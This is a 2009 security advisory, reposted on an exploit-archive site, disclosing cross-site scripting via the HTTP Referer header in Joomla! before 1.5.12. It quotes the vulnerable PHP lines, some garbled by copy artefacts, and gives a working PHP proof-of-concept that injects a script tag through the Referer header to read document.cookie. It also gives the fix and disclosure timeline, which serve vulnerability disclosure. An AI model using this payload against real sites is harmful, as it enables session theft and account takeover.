首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla! versions prior to 1.5.12 suffer from multiple cross site scripting vulne
来源:jgaliana[at]isecauditors.com 作者:Lara 发布时间:2009-07-03  
=============================================
INTERNET SECURITY AUDITORS ALERT 2009-007
- Original release date: June 30th, 2009
- Last revised:  July 2nd, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers

II. BACKGROUND
-------------------------
Joomla! is an award-winning content management system (CMS), which
enables you to build Web sites and powerful online applications. Many
aspects, including its ease-of-use and extensibility, have made
Joomla! the most popular Web site software available. Best of all,
Joomla! is an open source solution that is freely available to everyone.

III. DESCRIPTION
-------------------------
Joomla! fails to sanitized user supplied input. An attacker can inject
JavaScript or DHTML code that will be executed in the context of
targeted user browser, allowing him to steal cookies. HTTP headers are
not properly parsed, concretly the HTTP_REFERER variable.

Snippet of vulnerable code:

Line 225 of file components/com_content/views/article/tmpl/form.php is
vunerable.

221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="<?php echo
$this->article->id; ?>" />
223 <input type="hidden" name="version" value="<?php echo
$this->article->version; ?>" />
224 <input type="hidden" name="created_by" value="<?php echo
$this->article->created_by; ?>" />
225 <input type="hidden" name="referer" value="<?php echo
@
___FCKpd___0
SERVER['HTTP_REFERER']; ?>" /> 226 <?php echo JHTML::_( 'form.token' ); ?> 227 <input type="hidden" name="task" value="" /> 228 </form> Other parts of code may be affected: components/com_user/controller.php:86: $return = @
___FCKpd___0
SERVER['HTTP_REFERER']; plugins/system/legacy/html.php:246: echo '<a href="'.
___FCKpd___0
SERVER['HTTP_REFERER'] .'"><span class="small">'. JText::_( 'BACK' ) .'</span></a>'; templates/beez/html/com_content/article/form.php:186: <input type="hidden" name="referer" value="<?php echo @
___FCKpd___0
SERVER['HTTP_REFERER']; ?>" /> IV. PROOF OF CONCEPT ------------------------- An attacker can redirect the victim to a site with this script for executing javascript code in the victim's browser. The PoC creates a crafted HTTP request with malicious data in the HTTP_REFERER header. In order to succesfully exploit it, an account with any role is needed. For example, an user with any role can escalate privileges to administrator. <?php /* PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2009 */ /* config */ $site='localhost'; $path='/joomla-1.5.11'; $cookname='d85558a8cf943386aaa374896bfd3d99'; $cookvalue='4ab56fdd83bcad86289726aead602699'; class cURL { var $headers; var $user_agent; var $compression; var $cookie_file; var $proxy; /* evil script */ var $xss='alert("PWN PWN PWN: " + document.cookie);'; function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') { $this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->headers[] = 'Referer: "><script>' . $this->xss .'</script><span a="'; $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)'; $this->compression=$compression; $this->proxy=$proxy; $this->cookies=$cookies; if ($this->cookies == TRUE) $this->cookie($cookie); } function cookie($cookie_file) { if (file_exists($cookie_file)) { $this->cookie_file=$cookie_file; } else { fopen($cookie_file,'w') or $this->error('The cookie file could not be opened. Check permissions'); $this->cookie_file=$cookie_file; fclose($this->cookie_file); } } function get($url) { $process = curl_init($url); curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers); curl_setopt($process, CURLOPT_HEADER, 0); curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent); if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEFILE, $this->cookie_file); if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEJAR, $this->cookie_file); curl_setopt($process,CURLOPT_ENCODING , $this->compression); curl_setopt($process, CURLOPT_TIMEOUT, 30); if ($this->proxy) curl_setopt($cUrl, CURLOPT_PROXY, 'proxy_ip:proxy_port'); curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1); $return = curl_exec($process); curl_close($process); return $return; } function error($error) { echo $error; die; } } /* set cookie */ $f=fopen("cookies.txt","w"); fwrite($f,"localhost\tFALSE\t/\tFALSE\t0\t$cookname\t$cookvalue\n"); fclose($f); /* do request */ $cc = new cURL(); $c=$cc->get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form'); /* let's execute some javascript.. }:-)*/ echo $c; ?> V. BUSINESS IMPACT ------------------------- An attacker can exploit the vulnerability to inyect DHTML and JavaScript code in the context of the web browser. This may lead in steal the targeted user cookies and gain access to the user account icluding administrator privileges. VI. SYSTEMS AFFECTED ------------------------- Joomla! versions prior and including 1.5.11 are vulnerable. VII. SOLUTION ------------------------- Upgrade to version 1.5.12 VIII. REFERENCES ------------------------- http://www.joomla.org http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- June 30, 2009: Initial release. July 02, 2009: Last revision. XI. DISCLOSURE TIMELINE ------------------------- June 30, 2009: Discovered by Internet Security Auditors. June 30, 2009: Vendor contacted. Fast response. July 01, 2009: Joomla! publish update. Great job. July 02, 2009: Advisory published. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·win32 xp-sp3 beep and exitproc
·Almnzm 2.0 Remote Blind SQL In
·Soulseek versions 157 NS below
·YourTube <= 2.0 Arbitrary Data
·[0-Day] ShopCartDx <= v4.30 (p
·Oracle 10g SYS.LT.COMPRESSWORK
·[0-Day] ShopCartDx <= v4.30 (p
·Apple Safari 4.x JavaScript Re
·Local root exploit for FreeBSD
·fipsCMS Light version 2.1 arbi
·AudioPLUS 2.00.215 (.pls) Loca
·Microsoft DirectShow MPEG2Tune
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved